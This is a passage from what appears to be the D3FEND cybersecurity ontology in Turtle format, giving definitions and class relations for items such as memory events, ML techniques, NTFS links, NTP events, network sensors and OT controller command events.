"Software Configuration" ; d3f:related d3f:ApplicationConfigurationHardening, d3f:CertificatePinning . d3f:M1055 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Do Not Mitigate" . d3f:M1056 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Pre-compromise" ; d3f:related d3f:DecoyEnvironment, d3f:DecoyObject . d3f:MACAddress a owl:Class, owl:NamedIndividual ; rdfs:label "MAC Address" ; d3f:definition "A media access control address (MAC address) is a unique identifier assigned to a network interface controller (NIC) for use as a network address in communications within a network segment." ; d3f:identifies d3f:NetworkInterfaceCard ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:identifies ; owl:someValuesFrom d3f:NetworkInterfaceCard ], d3f:Identifier . d3f:MSGEmailFile a d3f:Email, owl:NamedIndividual ; rdfs:label "MSG Email File" . d3f:Maximum-marginLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Maximum-margin Learning" ; d3f:d3fend-id "D3A-MML" ; d3f:definition "Maximum-margin classifiers attempt to maximize the distance between the given data points and the decision boundary" ; d3f:kb-article """## References Engelen, S., & Hoos, H. (2020). A survey on semi-supervised learning. Machine Learning, 109(2), 299-337. [Link](https://link.springer.com/article/10.1007/s10994-019-05855-6). Support Vector Machines for Machine Learning. [Link](https://machinelearningmastery.com/support-vector-machines-for-machine-learning/#:~:text=The%20distance%20between%20the%20line,called%20the%20Maximal%2DMargin%20hyperplane.)""" ; rdfs:subClassOf d3f:IntrinsicallySemi-supervisedLearning . d3f:MediaGeneration a owl:Class ; rdfs:label "Media Generation" ; rdfs:subClassOf d3f:Generation ; owl:disjointWith d3f:Simulation . d3f:MediaServer a owl:Class ; rdfs:label "Media Server" ; d3f:definition "A media server is a computer appliance or an application software that stores digital media (video, audio or images) and makes it available over a network. Media servers range from servers that provide video on demand to smaller personal computers or NAS (Network Attached Storage) for the home." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Server . d3f:MemoryAllocationFunction a owl:Class, owl:NamedIndividual ; rdfs:label "Memory Allocation Function" ; d3f:definition "Reserves memory for a running process to use." ; d3f:invokes d3f:AllocateMemory ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:invokes ; owl:someValuesFrom d3f:AllocateMemory ], d3f:Subroutine . d3f:MemoryDeviceEvent a owl:Class ; rdfs:label "Memory Device Event" ; d3f:definition "An event describing activity in primary storage devices, such as DRAM or SRAM memory initialization, reconfiguration, or failures." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:PrimaryStorage ], d3f:HardwareDeviceEvent . d3f:MemoryMapEvent a owl:Class ; rdfs:label "Memory Map Event" ; d3f:definition "An event representing the mapping of memory regions into a process's virtual address space, enabling efficient access to shared or reserved memory." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:VirtualMemorySpace ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:MemoryAllocationEvent ], d3f:MemoryEvent . d3f:MemoryModificationEvent a owl:Class ; rdfs:label "Memory Modification Event" ; d3f:definition "An event where a process modifies allocated memory, potentially altering its content, behavior, or state." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:MemoryAllocationEvent ], d3f:MemoryEvent . d3f:MemoryPool a owl:Class, owl:NamedIndividual ; rdfs:label "Memory Pool" ; d3f:contains d3f:MemoryBlock ; d3f:definition "Memory pools, also called fixed-size blocks allocation, is the use of pools for memory management… preallocating a number of memory blocks with the same size called the memory pool. The application can allocate, access, and free blocks represented by handles at run time." ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:MemoryBlock ], d3f:MemoryExtent . d3f:MemoryReadEvent a owl:Class ; rdfs:label "Memory Read Event" ; d3f:definition "An event where a process retrieves data from a specific memory address, either from its own allocated space or that of another process." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:MemoryAllocationEvent ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:RawMemoryAccessFunction ], d3f:MemoryEvent . d3f:MemoryWriteEvent a owl:Class ; rdfs:label "Memory Write Event" ; d3f:definition "An event where a process writes data to a memory address, storing new information or updating existing content." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:MemoryAllocationEvent ], d3f:MemoryEvent . d3f:Microcode a owl:Class ; rdfs:label "Microcode" ; d3f:definition "Microcode is a computer hardware technique that interposes a layer of organization between the CPU hardware and the programmer-visible instruction set architecture of the computer. As such, the microcode is a layer of hardware-level instructions that implement higher-level machine code instructions or internal state machine sequencing in many digital processing elements." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Firmware . d3f:MicrosoftWordDOCBFile a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Microsoft Word DOCB File" . d3f:MicrosoftWordDOCFile a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Microsoft Word DOC File" . d3f:MicrosoftWordDOCMFile a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Microsoft Word DOCM File" . d3f:MicrosoftWordDOCXFile a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Microsoft Word DOCX File" . d3f:MicrosoftWordDOTFile a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Microsoft Word DOT File" . d3f:MicrosoftWordDOTMFile a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Microsoft Word DOTM File" . d3f:MicrosoftWordDOTXFile a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Microsoft Word DOTX File" . d3f:MicrosoftWordWBKFile a d3f:DocumentFile, owl:NamedIndividual ; rdfs:label "Microsoft Word WBK File" . d3f:MobilePhone a owl:Class ; rdfs:label "Mobile Phone" ; d3f:definition "A mobile phone, cellular phone, cell phone, cellphone or hand phone, sometimes shortened to simply mobile, cell or just phone, is a portable telephone that can make and receive calls over a radio frequency link while the user is moving within a telephone service area. The radio frequency link establishes a connection to the switching systems of a mobile phone operator, which provides access to the public switched telephone network (PSTN). Modern mobile telephone services use a cellular network architecture and, therefore, mobile telephones are called cellular telephones or cell phones in North America. In addition to telephony, digital mobile phones (2G) support a variety of other services, such as text messaging, MMS, email, Internet access, short-range wireless communications (infrared," ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:PersonalComputer ; skos:altLabel "Cellphone", "Cellular Phone" . d3f:Model-basedPolicyOptimization a owl:Class, owl:NamedIndividual ; rdfs:label "Model-based Policy Optimization" ; d3f:d3fend-id "D3A-MBPO" ; d3f:definition "Model-based policy optimization (MBPO) is a model-based, online, off-policy reinforcement learning algorithm. For more information on the different types of reinforcement learning agents" ; d3f:kb-article """## References MBPO Agents. MathWorks. [Link](https://www.mathworks.com/help/reinforcement-learning/ug/mbpo-agents.html).""" ; rdfs:subClassOf d3f:Model-basedReinforcementLearning . d3f:Model-basedValueIteration a owl:Class, owl:NamedIndividual ; rdfs:label "Model-based Value Iteration" ; d3f:d3fend-id "D3A-MBVI" ; d3f:definition "Value Iteration effectively reducesthe evaluation stage down to a single sweep of the states. Additionally, to improve things further, it combines the Policy Evaluation and Policy Improvement stages into a single update." ; d3f:kb-article """## References Policy and Value Iteration. Towards Data Science. [Link](https://towardsdatascience.com/policy-and-value-iteration-78501afb41d2).""" ; d3f:synonym "MBVI" ; rdfs:subClassOf d3f:Model-basedReinforcementLearning . d3f:MotionDetectedEvent a owl:Class ; rdfs:label "Motion Detected Event" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:MotionDetector ], d3f:PhysicalAccessAlarmEvent . d3f:MouseInputDevice a owl:Class ; rdfs:label "Mouse Input Device" ; d3f:definition "A computer mouse (plural mice or mouses) is a hand-held pointing device that detects two-dimensional motion relative to a surface. This motion is typically translated into the motion of a pointer on a display, which allows a smooth control of the graphical user interface of a computer. In addition to moving a cursor, computer mice have one or more buttons to allow operations such as selection of a menu item on a display. Mice often also feature other elements, such as touch surfaces and scroll wheels, which enable additional control and dimensional input." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:InputDevice ; skos:altLabel "Computer Mouse" . d3f:MovingAverageModel a owl:Class, owl:NamedIndividual ; rdfs:label "Moving Average Model" ; d3f:d3fend-id "D3A-MAM" ; d3f:definition "the moving-average model (MA model) is an approach for modeling univariate time series and specifies that the output variable is cross-correlated with a non-identical to itself random-variable." ; d3f:kb-article """## Refrences Wikipedia. (n.d.). Moving average model. [Link](https://en.wikipedia.org/wiki/Moving_average_model)""" ; d3f:synonym "MA Model" ; rdfs:subClassOf d3f:TimeSeriesAnalysis . d3f:MulticlassClassification a owl:Class ; rdfs:label "Multiclass Classification" ; rdfs:subClassOf d3f:Classifying . d3f:MultilayerPerceptronClassification a owl:Class, owl:NamedIndividual ; rdfs:label "Multilayer Perceptron Classification" ; d3f:d3fend-id "D3A-MPC" ; d3f:definition "A multilayer perceptron (MLP) is a fully connected class of feedforward artificial neural network (ANN).An MLP consists of at least three layers of nodes: an input layer, a hidden layer and an output layer." ; d3f:kb-article """## References Multilayer perceptron. Wikipedia. [Link](https://en.wikipedia.org/wiki/Multilayer_perceptron).""" ; rdfs:subClassOf d3f:ArtificialNeuralNetClassification . d3f:MultimediaDocumentFile a owl:Class ; rdfs:label "Multimedia Document File" ; d3f:definition "Digital video files which often contain audio." ; rdfs:seeAlso ; rdfs:subClassOf d3f:DocumentFile . d3f:MultimediaFile a owl:Class, owl:NamedIndividual ; rdfs:label "Multimedia File" ; d3f:contains d3f:DigitalMultimedia ; d3f:definition "A file that contains digital multimedia." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:DigitalMultimedia ], d3f:File . d3f:MultipleRegressionLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Multiple Regression Learning" ; d3f:d3fend-id "D3A-MRL" ; d3f:definition "A supervised learning method that builds a multiple regression model using training data." ; d3f:kb-article """## References Yale University Department of Statistics. (1997-98). Linear regression and multivariate analysis. [Link](http://www.stat.yale.edu/Courses/1997-98/101/linmult.htm)""" ; rdfs:seeAlso d3f:MultipleRegression ; rdfs:subClassOf d3f:RegressionAnalysisLearning . d3f:NIST_SP_800-53_R3 a d3f:NISTSP800-53ControlCatalog, owl:NamedIndividual ; rdfs:label "NIST SP 800-53 R3" ; d3f:archived-at "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2013-04-30"^^xsd:anyURI ; d3f:version 3 ; rdfs:seeAlso . d3f:NIST_SP_800-53_R4 a d3f:NISTSP800-53ControlCatalog, owl:NamedIndividual ; rdfs:label "NIST SP 800-53 R4" ; d3f:archived-at "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2013-04-30"^^xsd:anyURI ; d3f:version 4 ; rdfs:seeAlso . d3f:NTFSHardLink a owl:Class ; rdfs:label "NTFS Hard Link" ; d3f:definition "An NTFS hard link points to another file, and files share the same MFT entry (inode), in the same filesystem." ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf d3f:HardLink, d3f:NTFSLink . d3f:NTFSJunctionPoint a owl:Class ; rdfs:label "NTFS Junction Point" ; d3f:definition "NTFS junction points are are similar to NTFS symlinks but are defined only for directories. Only accepts local absolute paths." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:NTFSLink, d3f:SymbolicLink ; skos:altLabel "Junction Point" . d3f:NTFSSymbolicLink a owl:Class ; rdfs:label "NTFS Symbolic Link" ; d3f:definition "An NTFS symbolic link records the path of another file that the links contents should show. Can accept relative paths. SMB networking (UNC path) and directory support added in NTFS 3.1." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:NTFSLink, d3f:SymbolicLink ; skos:altLabel "NTFS Symlink" . d3f:NTPBroadcastEvent a owl:Class ; rdfs:label "NTP Broadcast Event" ; d3f:definition "An event where an NTP server broadcasts time synchronization messages to multiple clients simultaneously, enabling synchronization without individual request-response cycles." ; rdfs:subClassOf d3f:NTPEvent . d3f:NTPControlMessageEvent a owl:Class ; rdfs:label "NTP Control Message Event" ; d3f:definition "An event where an NTP client or server exchanges control messages used for diagnostic, monitoring, or administrative management of the NTP protocol, rather than time synchronization." ; rdfs:subClassOf d3f:NTPEvent . d3f:NTPServerResponseEvent a owl:Class ; rdfs:label "NTP Server Response Event" ; d3f:definition "An event where an NTP server sends time synchronization data to a client, enabling the client to align its local clock with the server's reference time." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:NTPClientSyncEvent ], d3f:NTPEvent . d3f:NTPSymmetricPassiveExchangeEvent a owl:Class ; rdfs:label "NTP Symmetric Passive Exchange Event" ; d3f:definition "An event where an NTP peer operating in symmetric passive mode responds to clock synchronization messages initiated by a symmetric active peer, facilitating mutual timekeeping." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:NTPSymmetricActiveExchangeEvent ], d3f:NTPEvent . d3f:NaiveBayesClassifier a owl:Class, owl:NamedIndividual ; rdfs:label "Naive Bayes Classifier" ; d3f:d3fend-id "D3A-NBC" ; d3f:definition "The Naïve Bayes classifier is a supervised machine learning algorithm, which is used for classification tasks, like text classification. It is also part of a family of generative learning algorithms, meaning that it seeks to model the distribution of inputs of a given class or category." ; d3f:kb-article """## References Naive Bayes. IBM. [Link](https://www.ibm.com/topics/naive-bayes?mhsrc=ibmsearch_a&mhq=naive%20bayes).""" ; rdfs:subClassOf d3f:Classification . d3f:NetworkAudioStreamingResource a owl:Class ; rdfs:label "Network Audio Streaming Resource" ; d3f:definition "A server that provides digital audio media content to users." ; rdfs:subClassOf d3f:NetworkMediaStreamingResource . d3f:NetworkDirectoryResource a owl:Class, owl:NamedIndividual ; rdfs:label "Network Directory Resource" ; d3f:contains d3f:Directory ; d3f:definition "A directory resource made available from one host to other hosts on a computer network." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:Directory ], d3f:NetworkFileShareResource . d3f:NetworkFlowSensor a owl:Class, owl:NamedIndividual ; rdfs:label "Network Flow Sensor" ; d3f:definition "Monitors network traffic and produces summaries of data flows traversing the network." ; d3f:monitors d3f:NetworkFlow ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:NetworkFlow ], d3f:NetworkSensor . d3f:NetworkLink a owl:Class ; rdfs:label "Network Link" ; d3f:definition "A network link is a link within the network layer, which is responsible for packet forwarding including routing through intermediate routers." ; d3f:synonym "Layer-3 Link", "Network Layer Link" ; rdfs:seeAlso , ; rdfs:subClassOf d3f:LogicalLink . d3f:NetworkPrinter a owl:Class ; rdfs:label "Network Printer" ; d3f:definition "In computing, a network printer is a device that can be accessed over a network which makes a persistent representation of graphics or text, usually on paper. While most output is human-readable, bar code printers are an example of an expanded use for printers. The different types of printers include 3D printer, inkjet printer, laser printer, thermal printer, etc. Note that not all printers are networked and the digital information to be printed must be passed either by removable media or as directly connecting the printer to a computer (e.g., by USB.)" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:SharedComputer . d3f:NetworkProtocolAnalyzer a owl:Class, owl:NamedIndividual ; rdfs:label "Network Protocol Analyzer" ; d3f:definition "Monitors and parses network protocols to extract values from various network protocol layers." ; d3f:monitors d3f:NetworkTraffic ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:NetworkTraffic ], d3f:NetworkSensor . d3f:NetworkScanner a owl:Class, owl:NamedIndividual ; rdfs:label "Network Scanner" ; d3f:definition "A network scanner is a computer program used to retrieve usernames and info on groups, shares, and services of networked computers. This type of program scans networks for vulnerabilities in the security of that network. If there is a vulnerability with the security of the network, it will send a report back to a hacker who may use this info to exploit that network glitch to gain entry to the network or for other malicious activities. Ethical hackers often also use the information to remove the glitches and strengthen their network." ; d3f:monitors d3f:Network ; rdfs:isDefinedBy ; rdfs:seeAlso ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:monitors ; owl:someValuesFrom d3f:Network ], d3f:CyberSensor ; skos:altLabel "Network Enumerator" . d3f:NetworkTrafficAnalysisSoftware a owl:Class ; rdfs:label "Network Traffic Analysis Software" ; d3f:definition "A packet analyzer, also known as packet sniffer, protocol analyzer, or network analyzer, is a computer program or computer hardware such as a packet capture appliance, that can intercept and log traffic that passes over a computer network or part of a network.\"" ; d3f:synonym "Network Sniffer" ; rdfs:subClassOf d3f:DeveloperApplication . d3f:NetworkVideoStreamingResource a owl:Class ; rdfs:label "Network Video Streaming Resource" ; d3f:definition "A server that provides digital video media content to users." ; rdfs:subClassOf d3f:NetworkMediaStreamingResource . d3f:Non-ParametricTests a owl:Class, owl:NamedIndividual ; rdfs:label "Non-Parametric Tests" ; d3f:d3fend-id "D3A-NPT" ; d3f:definition "A non-parametric test relies is used when the underlying distribution of data is non-symmetric (non-normal distribution)." ; d3f:kb-article """## References Newcastle University. (n.d.). Parametric Hypothesis Tests. [Link](https://www.ncl.ac.uk/webtemplate/ask-assets/external/maths-resources/psychology/non-parametric-hypothesis-tests.html)""" ; rdfs:subClassOf d3f:HypothesisTesting . d3f:Non-monotonicLogic a owl:Class, owl:NamedIndividual ; rdfs:label "Non-monotonic Logic" ; d3f:d3fend-id "D3A-NML" ; d3f:definition "Non-monotonic logic is a formal logic whose conclusion relation is not monotonic. In other words, non-monotonic logics are devised to capture and represent defeasible inferences (cf. defeasible reasoning), i.e., a kind of inference in which reasoners draw tentative conclusions, enabling reasoners to retract their conclusion(s) based on further evidence." ; d3f:kb-article """## References 1. Non-monotonic logic. (2023, June 1). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Non-monotonic_logic)""" ; rdfs:subClassOf d3f:SymbolicAI . d3f:NonlinearRegressionLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Nonlinear Regression Learning" ; d3f:d3fend-id "D3A-NRL" ; d3f:definition "A supervised learning method that builds a non-linear regression model using training data." ; d3f:kb-article """## References Wikipedia. (n.d.). Nonlinear regression. [Link](https://en.wikipedia.org/wiki/Nonlinear_regression)""" ; rdfs:seeAlso d3f:NonlinearRegression ; rdfs:subClassOf d3f:RegressionAnalysisLearning . d3f:OTAbortCommandEvent a owl:Class ; rdfs:label "OT Abort Command Event" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:OTRunCommandEvent ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTAbortCommand ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControllerOperatingMode ], d3f:OTModifyDeviceOperatingModeCommandEvent . d3f:OTAlarmMessageEvent a owl:Class ; rdfs:label "OT Alarm Message Event" ; d3f:definition "Report danger, hazards, or serious errors." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTAlarmMessage ], d3f:OTDiagnosticsMessageEvent . d3f:OTChangeControlProgramCommandEvent a owl:Class ; rdfs:label "OT Change Control Program Command Event" ; d3f:definition "Commands a remote device to modify an existing control program." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTChangeControlProgramCommand ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControlProgram ], d3f:OTModifyControlProgramCommandEvent . d3f:OTChangeDataCommandEvent a owl:Class ; rdfs:label "OT Change Data Command Event" ; d3f:definition "OT command that modifies existing data on a remote device." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTChangeDataCommand ], d3f:OTWriteCommandEvent . d3f:OTControlCommandEvent a owl:Class ; rdfs:label "OT Control Command Event" ; d3f:definition "Command and control the managed process." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControlCommand ], d3f:OTProcessDataCommandEvent . d3f:OTControlVariable a owl:Class ; rdfs:label "OT Control Variable" ; d3f:definition "A control variable is the measurement of the physical condition of the device that influences the Process Variables." ; rdfs:isDefinedBy "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en" ; rdfs:subClassOf d3f:OTLogicVariable ; skos:example "If the Set Point of a temperature control system for a residential dwelling is 72 degrees, and the Process Variable is 82 degrees, the Control Variable for the air conditioner should be 'on.'" . d3f:OTCreateDataCommandEvent a owl:Class ; rdfs:label "OT Create Data Command Event" ; d3f:definition "OT command that creates data on a remote device." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTCreateDataCommand ], d3f:OTWriteCommandEvent . d3f:OTCreateNewControlProgramCommandEvent a owl:Class ; rdfs:label "OT Create New Control Program Command Event" ; d3f:definition "Commands a remote device to create an control program." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControlProgram ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTCreateNewControlProgramCommand ], d3f:OTModifyControlProgramCommandEvent . d3f:OTDebugCommandEvent a owl:Class ; rdfs:label "OT Debug Command Event" ; d3f:definition "Investigate or analyze the current state of the system." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTDebugCommand ], d3f:OTDiagnosticsMessageEvent . d3f:OTDeleteControlProgramCommandEvent a owl:Class ; rdfs:label "OT Delete Control Program Command Event" ; d3f:definition "Commands a remote device to remove an existing control program." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTDeleteControlProgramCommand ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControlProgram ], d3f:OTModifyControlProgramCommandEvent . d3f:OTDeleteDataCommandEvent a owl:Class ; rdfs:label "OT Delete Data Command Event" ; d3f:definition "OT command that removes data on a remote device." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTDeleteDataCommand ], d3f:OTWriteCommandEvent . d3f:OTDeviceDescriptionMessageEvent a owl:Class ; rdfs:label "OT Device Description Message Event" ; d3f:definition "Describe features, abilities, or performance of system components." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTDeviceDescriptionMessage ], d3f:OTDeviceManagementMessageEvent . d3f:OTDeviceFirmwareCommandEvent a owl:Class ; rdfs:label "OT Device Firmware Command Event" ; d3f:definition "Interact with the software responsible for low-level control of the system." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTDeviceFirmwareCommand ], d3f:OTDeviceManagementMessageEvent . d3f:OTDeviceIdentificationMessageEvent a owl:Class ; rdfs:label "OT Device Identification Message Event" ; d3f:definition "Identify devices on the network." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTDeviceIdentificationMessage ], d3f:OTDeviceManagementMessageEvent . d3f:OTDisconnectRemoteConnectionCommandEvent a owl:Class ; rdfs:label "OT Disconnect Remote Connection Command Event" ; d3f:definition "The Disconnect Request message is sent to the message receiver to indicate that the transmitter is terminating its TCP socket." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTDisconnectRemoteConnectionCommand ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:OTEstablishRemoteConnectionCommandEvent ], d3f:OTConnectionCommandEvent . d3f:OTDownloadControlProgramCommandEvent a owl:Class ; rdfs:label "OT Download Control Program Command Event" ; d3f:definition "Commands a remote device to download a control program." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControlProgram ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTDownloadControlProgramCommand ], d3f:OTModifyControlProgramCommandEvent . d3f:OTErrorMessageEvent a owl:Class ; rdfs:label "OT Error Message Event" ; d3f:definition "An anticipated, reproducible defect occurred within the system." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTErrorMessage ], d3f:OTDiagnosticsMessageEvent . d3f:OTExceptionMessageEvent a owl:Class ; rdfs:label "OT Exception Message Event" ; d3f:definition "An unknown or anomalous condition occurred in the system." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTExceptionMessage ], d3f:OTDiagnosticsMessageEvent . d3f:OTHumanMachineInterface a owl:Class, owl:NamedIndividual ; rdfs:label "OT Human Machine Interface" ; d3f:contains d3f:HMIApplication, d3f:InputDevice, d3f:OutputDevice ; d3f:definition "Human-Machine Interfaces (HMIs) are systems used by an operator to monitor the real-time status of an operational process and to perform necessary control functions, including the adjustment of device parameters." ; d3f:modifies d3f:OTLogicVariable ; d3f:reads d3f:OTProcessDataHistorian ; d3f:synonym "HMI" ; rdfs:seeAlso ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:OutputDevice ], [ a owl:Restriction ; owl:onProperty d3f:reads ; owl:someValuesFrom d3f:OTProcessDataHistorian ], [ a owl:Restriction ; owl:onProperty d3f:modifies ; owl:someValuesFrom d3f:OTLogicVariable ], [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:InputDevice ], [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:HMIApplication ], d3f:OTEmbeddedComputer . d3f:OTModeSwitch a owl:Class, owl:NamedIndividual ; rdfs:label "OT Mode Switch" ; d3f:controls d3f:OTControllerOperatingMode ; d3f:definition "Keyswitch or mode switch is the mechanism for changing the operating mode of an OT controller or device." ; d3f:synonym "Mode Switch", "Programming Key Switch" ; rdfs:comment "An OT Mode Switch is a dedicated mechanism, implemented as either a physical keyswitch or a software control, that permits authorized users to transition an OT controller between its operating modes." ; rdfs:seeAlso , ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:controls ; owl:someValuesFrom d3f:OTControllerOperatingMode ], d3f:ApplicationConfiguration . d3f:OTNetwork a owl:Class, owl:NamedIndividual ; rdfs:label "OT Network" ; d3f:contains d3f:OTEmbeddedComputer ; d3f:definition "A computer network which connects OT devices." ; d3f:may-contain d3f:OTEngineeringWorkstation ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-contain ; owl:someValuesFrom d3f:OTEngineeringWorkstation ], [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:OTEmbeddedComputer ], d3f:IntranetNetwork . d3f:OTPauseCommandEvent a owl:Class ; rdfs:label "OT Pause Command Event" ; d3f:definition "Commands a device to pause a service/program." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControllerOperatingMode ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTPauseCommand ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:OTRunCommandEvent ], d3f:OTModifyDeviceOperatingModeCommandEvent . d3f:OTProgramModeCommandEvent a owl:Class ; rdfs:label "OT Program Mode Command Event" ; d3f:definition "Command that places the controller in a mode capable of reprogramming logic. This may or may not stop the program." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTProgramModeCommand ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTControllerOperatingMode ], d3f:OTModifyDeviceOperatingModeCommandEvent . d3f:OTProprietaryMessageEvent a owl:Class ; rdfs:label "OT Proprietary Message Event" ; d3f:definition "Vendor specific and may not be publicly documented, or values left for device specific configuration." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTProprietaryMessage ], d3f:OTEvent . d3f:OTReadDeviceConfigurationCommandEvent a owl:Class ; rdfs:label "OT Read Device Configuration Command Event" ; d3f:definition "Read device configuration." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTReadDeviceConfigurationCommand ], d3f:OTDeviceConfigurationCommandEvent . d3f:OTReadFileCommandEvent a owl:Class ; rdfs:label "OT Read File Command Event" ; d3f:definition "Reads data in specified chuncks or the contents of a specified file stored in the file device connected to the PC." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:File ], [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTReadFileCommand ], d3f:OTReadCommandEvent . d3f:OTReadTimeCommandEvent a owl:Class ; rdfs:label "OT Read Time Command Event" ; d3f:definition "Read timing mechanisms." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:OTReadTimeCommand ], d3f:OTTimeCommandEvent . d3f:OTReadValueCommandEvent a owl:Class ; rdfs:label "OT Read Value Command Event" ; d3f:definition "Reads the contents of the specified number of consecutive parameter areawords starting from the specified word." ; rdfs:subClassOf [ a owl:Restriction 